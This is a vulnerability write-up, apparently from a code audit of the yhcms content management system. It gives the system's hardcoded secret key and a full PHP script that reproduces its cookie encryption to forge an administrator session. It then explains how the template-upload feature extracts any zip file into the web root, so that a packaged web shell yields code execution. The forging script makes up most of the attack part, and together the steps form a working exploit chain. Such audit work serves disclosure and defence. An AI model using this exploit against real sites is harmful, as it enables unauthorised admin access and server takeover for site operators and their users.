First, I discovered that there is a backend with an authentication code that is hard to brute force, and since the source code is provided for auditing, my first thought was to find a way to forge the cookie to access the backend.

image-20240717174356486

When logging in, the request is sent to the admin.php/login/save route. The relevant source code should be in yhcms\apps\controllers\admin\Login.php.

image-20240717174615556

Analysis shows that the second last line of this function contains the set_cookie method, and the cookie name set is admin_token. The parameter passed in is $row['id'], which is the admin account’s ID in the table. The first admin’s ID is 1.

Next, I followed into the set_cookie function.

image-20240717174719623

I found that the passed-in ID value is processed by the sys_auth function. Further inspection revealed:

image-20240717174755668

This is an encryption function that uses a constant _SYSKEY_. Checking this constant revealed its location in cms.php.

image-20240717174829224

It indicates that _SYSKEY_ is defined as sys_key in yhcms/config/config.php with the value bfea3f68aca28b4f35a8c11f358a804e.

image-20240717174850104

At this point, I can extract the encryption function, set the parameter values, and automatically generate a forged cookie.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
<?php
$string = 1;
$type = 0;
$expiry = 0;
$key = "";
if (is_array($string)) $string = json_encode($string);
if ($type == 1) $string = str_replace('-', '+', $string);
$ckey_length = 4;
if ($key == '') $key = bfea3f68aca28b4f35a8c11f358a804e;
$key = md5(bfea3f68aca28b4f35a8c11f358a804e);
$keya = md5(substr($key, 0, 16));
$keyb = md5(substr($key, 16, 16));
$keyc = $ckey_length ? ($type == 1 ? substr($string, 0, $ckey_length) : substr(md5(microtime()), -$ckey_length)) : '';
$cryptkey = $keya . md5($keya . $keyc);
$key_length = strlen($cryptkey);
$string = $type == 1 ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0) . substr(md5($string . $keyb), 0, 16) . $string;
$string_length = strlen($string);
$result = '';
$box = range(0, 255);
$rndkey = array();
for ($i = 0; $i <= 255; $i++) {
    $rndkey[$i] = ord($cryptkey[$i % $key_length]);
}
for ($j = $i = 0; $i < 256; $i++) {
    $j = ($j + $box[$i] + $rndkey[$i]) % 256;
    $tmp = $box[$i];
    $box[$i] = $box[$j];
    $box[$j] = $tmp;
}
for ($a = $j = $i = 0; $i < $string_length; $i++) {
    $a = ($a + 1) % 256;
    $j = ($j + $box[$a]) % 256;
    $tmp = $box[$a];
    $box[$a] = $box[$j];
    $box[$j] = $tmp;
    $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
}
if ($type == 1) {
    if ((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26) . $keyb), 0, 16)) {
        $result = substr($result, 26);
        $json = json_decode($result, 1);
        if (!is_numeric($result) && $json) {
            return $json;
        } else {
            return $result;
        }
    }
    return '';
}
echo str_replace('+', '-', $keyc . str_replace('=', '', base64_encode($result)));

Set the forged cookie.

image-20240717185624116

Then visit the admin.php path to access the backend.

Template Upload Getshell

After entering the backend, our goal is to find a place for arbitrary file uploads.

In the system configuration - template management section, there is an upload template button.

Uploading any zip file reveals that the upload submission point is admin.php/tpl/uptpl?type=pc.

image-20240717185856005

The source code location is \yhcms\apps\controllers\admin\Tpl.php.

image-20240717185940067

Analyzing the code, I found that it checks the mime type of the uploaded content to determine if it is a zip file. If it is a zip file, it uploads it to the server and renames it to .zip.

Then it extracts the content of the zip file to the template/pc/ directory. Therefore, we can upload a zip folder containing a web shell, as shown below.

image-20240717190410463

After uploading, visit template/pc/test/phpinfo.php.

image-20240717190355801